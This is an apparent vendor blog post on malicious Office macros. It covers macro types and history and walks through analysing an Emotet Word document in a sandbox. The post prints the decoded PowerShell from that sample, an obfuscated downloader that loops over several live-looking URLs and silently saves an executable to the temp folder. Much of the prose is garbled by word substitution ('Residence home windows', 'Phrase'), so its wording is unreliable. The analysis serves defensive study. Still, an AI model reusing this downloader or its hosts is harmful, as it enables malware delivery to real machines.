Understanding Macros in Malware: Types, Capabilities, Case Study 

Macros are like mini packages inside completely different software program program. They comprise instructions designed to mechanically perform a group of operations. Macros are notably useful for vitality clients of productiveness software program program who want to streamline repetitive duties: 

• Batch resize pictures. 
• Merge separate excel data. 
• Create file copies. 
• Robotically once more up progress. 

As regards to exploits, it’s considerably very important to understand how macros are utilized in Microsoft Phrase. 

On this software program program suite, macros are written in scripting languages (VBA and Excel 4.0.) These languages allow direct entry to Residence home windows APIs, which makes them extraordinarily extremely efficient for every respectable use and, sadly, for hackers. 

Protect finding out to review: 

• Kinds of malicious macros you’ll normally encounter in modern malware. 
• What hackers can do with macros and the best way they use them: our experience. 
• Strategies to go from discovering an obfuscated macro in a maldoc to completely understanding what it does in a system. 

Let’s dive in! (Or leap straight to the case analysis).  

What makes MS Office macros dangerous? 

To raised understand potential dangers behind these automations, let’s take into consideration how a typical VBA macro works. The code snippet underneath converts a doc proper right into a PDF: 

Sub SaveDocumentAsPDF() 

    Dim filePath As String 

    Dim pdfPath As String 

     

    If ThisDocument.Path = "" Then 

        MsgBox "Please save your doc sooner than exporting to PDF.", vbInformation 

        Exit Sub 

    End If 

     

    filePath = ThisDocument.FullName 

     

    pdfPath = Alternate(filePath, ".docx", ".pdf") 

     

    ThisDocument.ExportAsFixedFormat OutputFileName:=pdfPath, _ 

                                      ExportFormat:=wdExportFormatPDF, _ 

                                      OpenAfterExport:=False, _ 

                                      OptimizeFor:=wdExportOptimizeForPrint, _ 

                                      Fluctuate:=wdExportAllDocument, _ 

                                      Merchandise:=wdExportDocumentContent, _ 

                                      IncludeDocProps:=True, _ 

                                      KeepIRM:=True, _ 

                                      CreateBookmarks:=wdExportCreateNoBookmarks, _ 

                                      DocStructureTags:=True, _ 

                                      BitmapMissingFonts:=True, _ 

                                      UseISO19005_1:=False 

     

    MsgBox "Doc has been saved as PDF: " & pdfPath, vbInformation 

End Sub 

This macro verifies if the doc has been saved, retrieves the current path and filename, saves it as a PDF, and notifies the individual upon completion. To comprehend this, the macro interacts with deep system parts: 

• By accessing ThisDocument.Path and ThisDocument.FullName, a macro reads from the file system to seek out out doc locations. Comparable code might very nicely be repurposed to assemble particulars concerning the aim system. 
• Using “ExportAsFixedFormat” it writes to the file system. The protection hazard arises not from the tactic itself nevertheless from the broader performance it demonstrates. For instance, this performance might very nicely be misused to place a malicious executable inside the temp itemizing. 

In reality, the methods talked about above aren’t malicious. Nevertheless they showcase how macros give entry to system belongings. Hackers can exploit this to manipulate data, deploy malware, and perform a variety of system-level actions: launch processes, entry group belongings and run directions. 

What can hackers do with macros? 

In our experience in dealing with macros in real-world assault eventualities, hackers typically use them to: 

• Entry CMD (Command Speedy)  
• Run PowerShell directions  
• Identify a DLL (Dynamic-link library) module that connects to a distant server 
• Identify a function by means of WinAPI (Residence home windows API) 
• Arrange connection and acquire file 
• Pull out system data from WMI (Residence home windows Administration Instrumentation) 

For instance, WMI permits instrumented parts to share system data and notifications. Since hackers can instantly work along with it through macros, they will gather particulars concerning the execution environment, similar to the OS mannequin and locale. This allows them to configure malware to run with the correct parameters or resolve if the system is acceptable for miners. 

Historic previous of malicious macros 

As you’ll see, macros present hackers a robust approach to use respectable devices. What makes the issue even worse is the extreme number of workstations in firm environments prone to this assault vector. Let’s uncover some historic previous to understand how we arrived at this case. 

Recognition of macros as an an an infection mechanism is intently tied to Microsoft Office — a software program program suite that is used in 83% of enterprise firms. 

Since early variations, the productiveness software program’s vitality clients relied carefully on macros to automate their routine — and hackers took phrase of this assault vector. 

The first well-known case of malware exploiting Phrase macros was the “Concept” virus from 1995.  

It demonstrated proof of concept that macros might very nicely be used to execute malicious code inside Phrase paperwork.  

From there, Throughout the late 90s and early 2000s, macro viruses surged. This prompted Microsoft to take movement and improve security. Microsoft disabled macros help by default starting with Office 2007, launched the “Perception Center” for further granular administration of security settings, and now requires to avoid wasting a number of data with specific extentsions to run macros (.docm, .xlsm, or .pptm). No matter all this, hackers are nonetheless able to effectively exploit this assault vector. 

At current, many malware households use macros inside the early phases of the an an infection chain. You’ll seemingly encounter macros with malware like Nanocore, Smoke Loader, RedLine, ZLoader, and Lokibot or another malware that will unfold through maldocs. 

(Look at analyzing a 64-bit mannequin of ZLoadre in ANY.RUN) 

Kinds of malicious macros 

As we talked about earlier, practically all macros you’ll encounter in malicious paperwork proper this second are written in each VBA or Excel 4.0 and it’s very important to know the excellence between how each is deployed. 

• VBA Macros: In modern Office packages, you’ll view macros written on this programming language of their respective Developer tabs inside the VBA editor. 

• Excel 4.0 macros: That’s an older macro language utilized in Microsoft Excel sooner than VBA grew to grow to be the same old. No matter its obsolescence, it’s nonetheless supported for backward compatibility. Excel 4.0 macros are more durable to determine, because of hackers can embed them instantly into the spreadsheet cells, normally in hidden tabs — like on this occasion. 

You’ve seemingly noticed from the occasion at first of the article that VBA is a standalone, fully-fledged language with its private syntax, and the an identical goes for Excel 4.0 macros. As a consequence of this, discovering macros is solely part of the issue — you moreover need to know what they do. Sadly, at this stage, you’ll encounter a roadblock — obfuscation. 

(Be taught our in-depth data to analyzing .NET obfuscators) 

Why is it troublesome to analysis malicious macros? 

The issue find out macros lies not solely within the necessity to know the language by which they’re written however moreover to deobfuscate the code. All macros you may come all through inside the are carefully obfuscated. Like this occasion from an contaminated Phrase doc:

Malicious macros are practically always obfuscated and onerous to analysis statically. 

Nevertheless happily, deobfuscating macro code itself isn’t essential in a number of cases. In any case, your important aim all through analysis must be to know the code’s efficiency contained in the system. You’ll get hold of this using various analysis devices. For instance, ANY.RUN interactive malware sandbox presents a script tracer that displays, step-by-step, the actions this technique executes on the system.

Analyzing macros in ANY.RUN 

ANY.RUN is an interactive malware analysis sandbox that gives a free plan. It’s a robust software program for analyzing malware which makes use of macros in its an an infection chain.  

You may discover fascinating sandbox courses with macros (above) that our clients beforehand ran inside the sandbox by filtering by malicious verdict and #macros tag in Public Submissions.  

Let’s analyze a malicious Phrase doc in ANY.RUN 

Let’s give consideration to this course of and analyze a maldoc. Wanting on the principal course of view, let’s momentarily disregard the reality that ANY.RUN has already detected Emotet train and alerted us by means of tags inside the increased correct nook of the interface — considering that such an expensive isn’t always on the market.  

Instead, let’s manually leap through the hoops to look out the macro, and understand further about it. To comprehend this, we have now to orient ourselves inside the interface of ANY.RUN a bit.

We’ll instantly work along with the VM through the VNC (Digital Group Computing) window on the center of the show display screen. VNC is a know-how that enables to remotely administration one different laptop computer. In ANY.RUN, it permits us to hold out essential actions contained in the system to run or view the macro inside the cloud VM. Let’s first search for the macro within the apparent location — the View Macros dialogue discipline (View → Macros → View Macros). 

An empty itemizing… Which means that each the macro doesn’t exist (though everyone knows this isn’t true) or that it’s saved in a module. It could very nicely be positioned elsewhere, just like “ThisDocument,” a class module, or a UserForm contained in the VBA editor. Let’s look there (select Developer → Seen Major inside the excessive panel). 

The Seen Major half inside the Developer tab displays a doc tree. Our focus is on the “Varieties” folder — a spot that holds personalized scripts.

Bingo! We uncover a dialogue discipline displaying what appears to be obfuscated code. We’ll delve deeper into inspecting it:

Throughout the VBA editor we are going to lastly see our macro, and that its code and variable names seem nonsensical, suggesting intentional obfuscation. 

Analyzing the macro in a Script Tracer 

There’s no stage in doing one thing extra with the VM, so let’s shut the obligation and switch to the recording view. Throughout the Superior Course of Particulars, we are going to entry further in-depth research and static analysis devices. These belongings will help us understand what this code does inside the system with out having to deobfuscate the macro itself. 

This generally is a Script Tracer view of the macro in ANY.RUN, and it displays step-by-step what the code did on the system. Instantly there are obvious crimson flags: 

“winmgmts:win32_Process” and “winmgmts:win32_ProcessStartup,” we see above, are associated to Residence home windows WMI. We’ve already talked about how malware can exploit malicious macros to query this interface for system data. Nonetheless, this alone isn’t enough to definitively conclude that the merchandise is malicious, so let’s proceed our investigation.

Then there’s the “ShowWindow” identify, seemingly used to manipulate the visibility of a window, which may be why we didn’t see the dialogue discipline of the macro as soon as we opened the doc. 

After which crucial crimson flag — the PowerShell identify, which is base64 encoded, as indicated by the -e parameter used for executing Base64-encoded directions. That’s value wanting into. Let’s decode it and see what’s inside: 

$�O�g�o�u�_�5�1�=�(�'�Q�t�7�'�+�'�1�'�+�'�t�l�5�'�)�;�.�(�'�n�e�'�+�'�w�-�i�'�+�'�t�e�m�'�)� �$�E�N�V�:�t�E�m�p��O�F�F�I�C�E�2�0�1�9� �-�i�t�e�m�t�y�p�e� �D�i�R�E�c�t�o�r�Y�;�[�N�e�t�.�S�e�r�v�i�c�e�P�o�i�n�t�M�a�n�a�g�e�r�]�:�:�"�S�`�e�C�U�r�i�T�y�`�P�r�O�T�`�O�C�`�O�l�"� �=� �(�'�t�'�+�'�l�s�1�2�'�+�'�,� �'�+�'�t�l�s�'�+�'�1�1�,�... 

Decoding it reveals partially readable code with non-alphanumeric characters (above), which we have now to clear as a lot as make it comprehensible. Let’s extra clear it: 

$Out_51 = ('Qt7'+'1'+'tl5'); 

.('ne'+'w-i'+'tem') $ENV:tempOFFICE2019 -itemtype Itemizing; 

[Net.ServicePointManager]::"SecurityProtocol" = ('t'+'ls12'+', '+'tls'+'11, tls'); 

$Qakfo0q = ('Z0'+'fv3kbg'); 

$Brv35rs = ('E6h'+'4'+'nkn'); 

$Ec9w4e0 = $env:temp+(('N'+'3pO'+'ffice2019N3'+'p')."re`Pl`AcE"('N3p',[sTring][CHAR]92))+ $Qakfo0q+('.ex'+'e'); 

$Z_jji3m = ('Ogp5'+'7w'+'j'); 

$Y7jmxz8 = &('new-'+'obje'+'ct') NET.webclient; 

$Innewc_ = ('http'+':'+'//5'+'2'+'5'+'0'+'750-5'+'6'+'-20180826151'+'45'+'3.'+'we'+'bstart'+'rz.'+'c'+'om/sa'+'v'+'ewayexpressthai.'+'c'+'om/j'+'n'+'ze_2o'+'3j_k/*htt'+'p://ouba'+'ina.'+'c'+'om/'+'w'+'p'+'-inc'+'ludes'+'/lqkz_n'+'vr_'+'1a'+'vf4/*htt'+'ps://'+'www.msb'+'c.'+'kz'+'/data/'+'k5'+'27_5'+'_cb'+'dvv5bi19/*htt'+'p://'+'okay'+'c'+'up'+'idating.'+'c'+'om/'+'im/'+'fsq'+'_e'+'sj'+'_q'+'gx06'+'0p/*'+'htt'+'p://'+'b'+'ike-nomad.'+'c'+'om/cg'+'i-'+'b'+'i'+'n/'+'wn_0'+'x'+'0_62m'+'nz'+'yh9q/'); 

"sP`lIt"([char]42); 

$Fe8neg4 = ('Ky'+'mrw9w'); 

foreach($Msuonh8 in $Innewc_){try{$Y7jmxz8."DoW`nLoa`dFile"($Msuonh8, $Ec9w4e0);} catch{}} 

$Cwio_h5 = ('E'+'6vp7vw'); 

break; 

$Tay50lk = ('Ph10g'+'b1')} 

catch{} 

$U7tmnk4 = ('Yewcw'+'8'+'okay') 

And above is the mannequin of the code that we are going to lastly study and understand. Let’s break it down: 

• $ENV:tempOFFICE2019 -itemtype Itemizing: refers again to the system’s momentary itemizing, seemingly aiming to place a file in a location that typically has a lot much less restrictive permissions. 
• [Net.ServicePointManager]::”SecurityProtocol” = (‘t’+’ls12’+’, ‘+’tls’+’11, tls’): modifies the SecurityProtocol. 
• &(‘new-‘+’obje’+’ct’) NET.webclient: creates a WebClient object for doubtlessly downloading malicious payloads from the online. A big crimson flag. 

('http'+':'+'//5'+'2'+'5'+'0'+'750-5'+'6'+'-20180826151'+'45'+'3.'+'we'+'bstart'+'rz.'+'c'+'om/sa'+'v'+'ewayexpressthai.'+'c'+'om/j'+'n'+'ze_2o'+'3j_k/*htt'+'p://ouba'+'ina.'+'c'+'om/'+'w'+'p'+'-inc'+'ludes'+'/lqkz_n'+'vr_'+'1a'+'vf4/*htt'+'ps://'+'www.msb'+'c.'+'kz'+'/data/'+'k5'+'27_5'+'_cb'+'dvv5bi19/*htt'+'p://'+'okay'+'c'+'up'+'idating.'+'c'+'om/'+'im/'+'fsq'+'_e'+'sj'+'_q'+'gx06'+'0p/*'+'htt'+'p://'+'b'+'ike-nomad.'+'c'+'om/cg'+'i-'+'b'+'i'+'n/'+'wn_0'+'x'+'0_62m'+'nz'+'yh9q/'); 

The half above constructs URLs from concatenated strings, a way to obscure the exact web addresses. 

foreach($Msuonh8 in $Innewc_){try{$Y7jmxz8."DoW`nLoa`dFile"($Msuonh8, $Ec9w4e0);} catch{}} 

And this part of the script makes an try to get hold of data from the constructed URLs with out coping with exceptions (the catch block is empty) — a typical tactic utilized by malicious scripts to verify the silent get hold of of payloads. 

The conduct above is unmistakenly that of malware. 

Understanding malicious macros: conclusions 

Throughout the article, we talked in regards to the dangers of macros, their kinds, historic previous, and collectively went from encountering a macro in a malicious doc to breaking down what it does inside the system using ANY.RUN. Let’s recap what we’ve found: 

• Macros are dual-use devices: These mini-programs that automate routine in productiveness software program program serve every as productiveness boosters and potential security threats. Throughout the context of malware analysis, we’re most concerned with macros in MS Office.  

• VBA and Excel 4.0: These scripting languages used for macros in Microsoft Office give direct entry to Residence home windows APIs, which allows exploitation by hackers. 

• Macros are extremely efficient and onerous to analysis. Hackers exploit them to run PowerShell directions, entry system data through WMI, and acquire data. Malicious macros are carefully obfuscated, nevertheless devices like ANY.RUN help uncover their conduct with out having to decode the obfuscation.  

About ANY.RUN 

ANY.RUN is a developer of cloud malware sandbox that handles the heavy lifting of malware analysis for SOC and DFIR teams, along with Menace Intelligence Feeds and Menace Intelligence Lookup. Daily, 300,000 professionals use our platform to analysis incidents and streamline menace analysis.   

Get started in ANY.RUN freed from cost →